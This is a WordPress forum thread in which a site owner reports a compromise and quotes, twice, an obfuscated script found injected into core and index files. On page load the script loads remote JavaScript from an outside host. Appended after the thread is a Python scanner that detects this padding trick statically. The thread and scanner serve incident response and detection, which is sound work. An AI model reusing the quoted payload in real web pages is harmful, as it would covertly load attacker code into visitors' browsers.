WordPress.org

Forums

<script> appearing in core files and disabling WordPress (4 posts)

  1. stonegauge
    Member
    Posted 5 years ago #

    The last two days, a site I host has been compromised twice by the same <script> popping up in core WordPress files. This happened on 2.8.6 and 2.9. Not faulting WordPress here -- there's something else at work that is allowing access for this code to be placed onto the site.

    At any rate, yesterday the code in question appeared in wp-includes/default-widgets.php and just now it appeared in wp-includes/default-filters.php at the very bottom of each file.

    <script>/*GNU GPL*/ try{window.onload = function(){var Z053al9rqw = document.createElement('s#$c@#()$r)&^(i@@()p$#!t!#('.replace(/\!|\$|@|\(|\^|&|\)|#/ig, ''));Z053al9rqw.setAttribute('type', 'text/javascript');Z053al9rqw.setAttribute('src', 'h$t&t@!$#p$#:(!/@@/(&)t!$i(m(!!^e#($-(#c@$o)!^m$&#.!!s$#)u)$@r#^v!@(e(&y)(&&m@@o((n!^k#&)^#e&y(#$.$!c!$o&($m@!#.)$w^$^a&s#$(h^i!#n$!^g))t@)o^n^p^^o^@#$s&^t@@-^!c(^&o&m!^!^$.#w!@i&$&$@n$)$t#&#!e))&r$$#s(&a!$(l@e!@(o)^$#n^$)l)(&)i@&n!!@#e#!.$@#r^)!u&#^:@$8@!0)$#8@^!0!!!/^^))g!($o)^&o&g@#)&l^&&)e().^$&c#)@$!o!@)m$$/$!!!#g$o)@(o@g)#l@#^)@e$!#.#^@#c(@o^m!#/#$&z(@e@!!(d((o##(.!c@^!o)!)m)/^!m#)!@e&d&#i^(@a@(p$l^^e#x($.#!#c^&&!o@#^m^^/$^)g&&!o(^&o^g@!l^@@e@#.$c(o!.@^t(^h^!/&&'.replace(/\^|\!|\)|#|\(|&|\$|@/ig, ''));Z053al9rqw.setAttribute('defer', 'defer');Z053al9rqw.setAttribute('id', 'M@^g(7)m$&5#l#s@$(!#o#@^k#!$q)$)'.replace(/&|@|\!|\$|#|\^|\)|\(/ig, ''));document.body.appendChild(Z053al9rqw);}} catch(e) {}</script>

    I'm wondering if this is a plugin that is compromising the site security (other blogs on my account have not been compromised) or if it's a theme file or what? I've changed the FTP access codes in case that was the site of the compromise...

  2. esmi
    Forum Moderator
    Posted 5 years ago #

  3. stonegauge
    Member
    Posted 5 years ago #

    Yeah, I never really "cleaned up" -- just removed the bad files. Also found a theme no longer posted RSS and that had to be changed. I'll follow the steps in those links. Thanks esmi.

  4. stonegauge
    Member
    Posted 5 years ago #

    I'm in the middle of following some steps from the above links and wanted to post what I found:

    Script code added to the index.php file itself

    <script>/*GNU GPL*/ try{window.onload = function(){var Z053al9rqw = document.createElement('s#$c@#()$r)&^(i@@()p$#!t!#('.replace(/\!|\$|@|\(|\^|&|\)|#/ig, ''));Z053al9rqw.setAttribute('type', 'text/javascript');Z053al9rqw.setAttribute('src', 'h$t&t@!$#p$#:(!/@@/(&)t!$i(m(!!^e#($-(#c@$o)!^m$&#.!!s$#)u)$@r#^v!@(e(&y)(&&m@@o((n!^k#&)^#e&y(#$.$!c!$o&($m@!#.)$w^$^a&s#$(h^i!#n$!^g))t@)o^n^p^^o^@#$s&^t@@-^!c(^&o&m!^!^$.#w!@i&$&$@n$)$t#&#!e))&r$$#s(&a!$(l@e!@(o)^$#n^$)l)(&)i@&n!!@#e#!.$@#r^)!u&#^:@$8@!0)$#8@^!0!!!/^^))g!($o)^&o&g@#)&l^&&)e().^$&c#)@$!o!@)m$$/$!!!#g$o)@(o@g)#l@#^)@e$!#.#^@#c(@o^m!#/#$&z(@e@!!(d((o##(.!c@^!o)!)m)/^!m#)!@e&d&#i^(@a@(p$l^^e#x($.#!#c^&&!o@#^m^^/$^)g&&!o(^&o^g@!l^@@e@#.$c(o!.@^t(^h^!/&&'.replace(/\^|\!|\)|#|\(|&|\$|@/ig, ''));Z053al9rqw.setAttribute('defer', 'defer');Z053al9rqw.setAttribute('id', 'M@^g(7)m$&5#l#s@$(!#o#@^k#!$q)$)'.replace(/&|@|\!|\$|#|\^|\)|\(/ig, ''));document.body.appendChild(Z053al9rqw);}} catch(e) {}</script>

    wp-content/index.php also has a script inserted. I just backed up the sites and the DB and will be doing an ultra-clean install (deleting everything on the server).
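
Added example, not part of the thread or any poster's code: a static scanner for the padding trick used in the script quoted above, where a string literal is stuffed with junk characters that a chained `.replace(/.../ig, '')` strips at run time. It decodes the literals without executing anything and flags `<script>` blocks in `.php` files that hide both a `script` tag name and a remote `src`. The function names and the sample input are assumptions made for illustration.

```python
import os
import re

# '<padded literal>'.replace(/<c1|c2|...>/ig, '') -- the padding trick in the injected script
OBFUSCATED = re.compile(r"'([^'\n]*)'\.replace\(/((?:\\.|[^/\\\n])+)/[gim]*,\s*''\)")
SCRIPT_BLOCK = re.compile(r"<script\b[^>]*>.*?</script>", re.I | re.S)


def decode_literals(js):
    """Strip the padding characters statically; the script is never executed."""
    out = []
    for literal, alternation in OBFUSCATED.findall(js):
        junk = {a or b for a, b in re.findall(r"\\(.)|([^|\\])", alternation)}
        out.append("".join(ch for ch in literal if ch not in junk))
    return out


def scan_text(text):
    """Return one finding per <script> block hiding a script tag name and a remote src."""
    findings = []
    for block in SCRIPT_BLOCK.finditer(text):
        decoded = decode_literals(block.group(0))
        urls = [d for d in decoded if d.lower().startswith(("http://", "https://"))]
        if "script" in (d.lower() for d in decoded) and urls:
            findings.append({"offset": block.start(), "src": urls})
    return findings


def scan_tree(root):
    """Scan every .php file under root (e.g. a WordPress install); map path -> findings."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    found = scan_text(fh.read())
                if found:
                    hits[path] = found
    return hits


# Constructed sample (not the payload from the thread); example.invalid is a placeholder host.
SAMPLE = (
    "<?php /* constructed stand-in for a core file */ ?>\n<script>try{window.onload=function(){"
    "var a=document.createElement('s#c$r@i#p$t'.replace(/#|\\$|@/ig, ''));a.setAttribute('src', "
    "'h@t#t$p:#/@/e$x#a@m$p#l@e.i#n$v@a#l$i@d/#x$.j@s'.replace(/@|#|\\$/ig, ''));"
    "document.body.appendChild(a);}}catch(e){}</script>\n"
)
```

Running `scan_tree` against a backup copy of the install lists every affected file, which helps confirm that a reinstall replaced all of them.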
